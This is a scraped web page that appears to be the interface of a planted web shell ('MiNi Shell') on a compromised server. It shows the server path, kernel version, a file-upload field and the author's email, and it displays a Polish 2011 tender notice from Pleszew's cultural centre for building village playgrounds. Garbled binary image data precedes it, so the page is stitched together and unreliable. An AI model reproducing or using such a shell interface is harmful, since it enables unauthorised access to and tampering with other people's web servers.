JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110315/44238-N-2011.html

<p class="kh_header"><b>Pleszew: Budowa placów zabaw na terenie gminy Pleszew</b><br>
<b>Numer ogłoszenia: 44238 - 2011; data zamieszczenia: 15.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Kultury , ul. Bogusza 1, 63-300 Pleszew, woj. wielkopolskie, tel. 0-62 74-28-362, faks 0-62 74-22-631.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucje kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw na terenie gminy Pleszew.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 - Budowa 5 placów zabaw w sołectwach: Bógwidze, Bronów, Brzezie, Dobra Nadzieja, Zawidowice w ramach  Programu Odnowa i rozwój wsi.
Zadanie nr 2 -Budowa placu zabaw w sołectwie Taczanów Drugi w ramach  Programu Odnowa i rozwój wsi. 
Każdy z placów zabaw będzie zbudowany z wykorzystaniem takich samych elementów wyposażenia. 
Budowa jednego placu zabaw obejmuje:
1.Roboty ziemne,
2.Nawierzchnię z piasku,
3.Wyposażenie placu zabaw w:
- zestaw zabawowy o wymiarach min 8,9 m x 7,1 m w skład, którego wchodzą: wieża czworokątna 1,2 m. - 4 szt., dach jednospadowy - 1 szt., dach dwuspadowy - 1 szt., dach czterospadowy - 1 szt., podest 0,9 m. - 1 szt., podest trójkątny 0,5 m.- 1 szt., pomost  z osłonami - 1 szt., pomost wiszący - 1 szt., pomost linowy - 1 szt., równoważnia - 1 szt., rurka strażacka 2,6 m. - 1 szt., portal wspinaczkowy - 1 szt., zjeżdżalnia 1,2 m. - 2 szt., ściana stalowa kratownica 2,1 m. - 1 szt., drabinka pozioma ze ścianką wspinaczkową  i siecią linową 1,9 m.- 1 szt., drabinka A szczebelkowo - wspinaczkowa - 1 szt. 
- huśtawkę wahadłową podwójną  dla dzieci w wieku 3-6 lat z siedziskami kubełkowym o wymiarach min.3,2 m x 2,0 m x 2,2 m - 1 szt., 
- huśtawkę wahadłową podwójną  dla dzieci w wieku 7-12 lat o wymiarach min. 3,8 m x 2,0 m x 2,2 m - 1 szt., 
- huśtawkę ważkę o wymiarach min. 3,1 m x 0,5 m x 0,6 m - 2 szt.  ,
- karuzelę 6-osobową z siedziskami o średnicy min. 1,5 m. - 1 szt.,
-  kiwak - sprężynowiec Tygrys o wymiarach 0,90 m x 0,30 m - 1 szt. 
 4. Elementy małej architektury:
- ławka bez oparcia - 2 szt.,
- kosz na śmieci - 2 szt.,
- regulamin - 1 szt.
Jeden Wykonawca może złożyć ofertę na dowolną liczbę w/w zadań.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.27.23-9, 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-posiadają wiedzę i doświadczenie - w postępowaniu na zadanie częściowe nr 1 mogą wziąć udział wykonawcy, którzy wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert (lub w okresie prowadzenia działalności, jeżeli jest ona prowadzona przez okres krótszy niż pięć lat) co najmniej 2 roboty budowlane polegające na budowie placów zabaw o wartości co najmniej 120.000,00 zł; w postępowaniu na zadanie częściowe nr 2 mogą wziąć udział wykonawcy, którzy wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert (lub w okresie prowadzenia działalności, jeżeli jest ona prowadzona przez okres krótszy niż pięć lat) co najmniej 2 roboty budowlane polegające na budowie placów zabaw o wartości co najmniej 30.000 zł</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-dysponują osobami zdolnymi do wykonania zamówienia - w postępowaniu mogą wziąć udział wykonawcy dysponujący osobą, która posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej i jest członkiem właściwej izby samorządu zawodowego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja o podwykonawcach, kosztorys ofertowy, pełnomocnictwo (jeżeli dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie:
1. Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach:
a.w przypadku wystąpienia okoliczności niezależnych od wykonawcy na uzasadniony wniosek wykonawcy, pod warunkiem, że zmiana ta wynika z okoliczności, których wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez niego zawiniona,
b.w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu oraz opóźnienia Zamawiającego w podpisaniu umowy,
c.w przypadku opóźnienia Zamawiającego w przekazaniu placu budowy,
d.w przypadku braków lub wad dokumentacji projektowej lub innych dokumentów budowy (np. pozwolenia na budowę), o ile Zamawiający zobowiązany jest do przekazania takich dokumentów wykonawcy,
e.opóźnień Zamawiającego w zakresie dokonywania odbiorów lub prób końcowych,
f.w przypadku zawieszenia robót przez Zamawiającego,
g.wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających realizację robót,
h.wykopalisk lub innych przeszkód uniemożliwiających prowadzenie robót, za które nie odpowiada wykonawca,
i.zmian w dokumentacji projektowej o czas niezbędny do dostosowania się wykonawcy do takiej zmiany.
2. Wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
a.zmiana stawki urzędowej podatku VAT,
b.zmiany poprzez zmniejszenie zakresu rzeczowego wykonanych robót.
3.W przypadku zajścia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy,
4. Inne zmiany:
a.w zakresie kluczowego personelu wykonawcy lub Zamawiającego, za uprzednią zgodą Zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze,
b.w zakresie podwykonawstwa za uprzednią zgodą Zamawiającego: - powierzenie podwykonawcom innej części robót niż wskazana w ofercie wykonawcy, - zmiana podwykonawcy na etapie realizacji robót, o ile nie sprzeciwia się to postanowieniom SIWZ,
c.w zakresie kolejności i terminów wykonywania robót wskazanych w SIWZ,
d.w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów techniczno-budowlanych.
5. Warunki zmian:
a.inicjowanie zmian - na wniosek wykonawcy lub Zamawiającego,
b.uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót,
c.forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pleszew.pl patrz: Instytucje kultury/Dom Kultury/Zamówienia Publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Kultury ul. Bogusza 1, 63-300 Pleszew pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2011 godzina 10:00, miejsce: Dom Kultury ul. Bogusza 1, 63-300 Pleszew pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa 5 placów zabaw w sołectwach: Bógwidze, Bronów, Brzezie, Dobra Nadzieja, Zawidowice w ramach Programu Odnowa i rozwój wsi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Każdy z placów zabaw będzie zbudowany z wykorzystaniem takich samych elementów wyposażenia. 
Budowa jednego placu zabaw obejmuje:
1.Roboty ziemne,
2.Nawierzchnię z piasku,
3.Wyposażenie placu zabaw w:
- zestaw zabawowy o wymiarach min 8,9 m x 7,1 m w skład, którego wchodzą: wieża czworokątna 1,2 m. - 4 szt., dach jednospadowy - 1 szt., dach dwuspadowy - 1 szt., dach czterospadowy - 1 szt., podest 0,9 m. - 1 szt., podest trójkątny 0,5 m.- 1 szt., pomost z osłonami - 1 szt., pomost wiszący - 1 szt., pomost linowy - 1 szt., równoważnia - 1 szt., rurka strażacka 2,6 m. - 1 szt., portal wspinaczkowy - 1 szt., zjeżdżalnia 1,2 m. - 2 szt., ściana stalowa kratownica 2,1 m. - 1 szt., drabinka pozioma ze ścianką wspinaczkową  i siecią linową 1,9 m.- 1 szt., drabinka A szczebelkowo - wspinaczkowa - 1 szt. 
- huśtawkę wahadłową podwójną  dla dzieci w wieku 3-6 lat z siedziskami kubełkowym  o wymiarach min.3,2 m x 2,0 m x 2,2 m - 1 szt., 
- huśtawkę wahadłową podwójną  dla dzieci w wieku 7-12 lat o wymiarach min. 3,8 m x 2,0 m x 2,2 m - 1 szt., 
- huśtawkę ważkę o wymiarach min. 3,1 m x 0,5 m x 0,6 m - 2 szt.  ,
- karuzelę 6-osobową z siedziskami o średnicy min. 1,5 m. - 1 szt.,
-  kiwak - sprężynowiec Tygrys o wymiarach 0,90 m x 0,30 m - 1 szt. 
4. Elementy małej architektury:
- ławka bez oparcia - 2 szt.,
- kosz na śmieci - 2 szt.,
- regulamin - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Budowa placu zabaw w sołectwie Taczanów Drugi w ramach Programu Odnowa i rozwój wsi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Każdy z placów zabaw będzie zbudowany z wykorzystaniem takich samych elementów wyposażenia. 
Budowa jednego placu zabaw obejmuje:
1.Roboty ziemne,
2.Nawierzchnię z piasku,
3.Wyposażenie placu zabaw w:
- zestaw zabawowy o wymiarach min 8,9 m x 7,1 m w skład, którego wchodzą: wieża czworokątna 1,2 m. - 4 szt., dach jednospadowy - 1 szt., dach dwuspadowy - 1 szt., dach czterospadowy - 1 szt., podest 0,9 m. - 1 szt., podest trójkątny 0,5 m.- 1 szt., pomost  z osłonami - 1 szt., pomost wiszący - 1 szt., pomost linowy - 1 szt., równoważnia - 1 szt., rurka strażacka 2,6 m. - 1 szt., portal wspinaczkowy - 1 szt., zjeżdżalnia 1,2 m. - 2 szt., ściana stalowa kratownica 2,1 m. - 1 szt., drabinka pozioma ze ścianką wspinaczkową i siecią linową 1,9 m.- 1 szt., drabinka A szczebelkowo - wspinaczkowa - 1 szt. 
- huśtawkę wahadłową podwójną  dla dzieci w wieku 3-6 lat z siedziskami kubełkowym o wymiarach min.3,2 m x 2,0 m x 2,2 m - 1 szt., 
- huśtawkę wahadłową podwójną  dla dzieci w wieku 7-12 lat o wymiarach min. 3,8 m x 2,0 m x 2,2 m - 1 szt., 
- huśtawkę ważkę o wymiarach min. 3,1 m x 0,5 m x 0,6 m - 2 szt.  ,
- karuzelę 6-osobową z siedziskami o średnicy min. 1,5 m. - 1 szt.,
-  kiwak - sprężynowiec Tygrys o wymiarach 0,90 m x 0,30 m - 1 szt. 
 4. Elementy małej architektury:
- ławka bez oparcia - 2 szt.,
- kosz na śmieci - 2 szt.,
- regulamin - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.27.23-9, 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com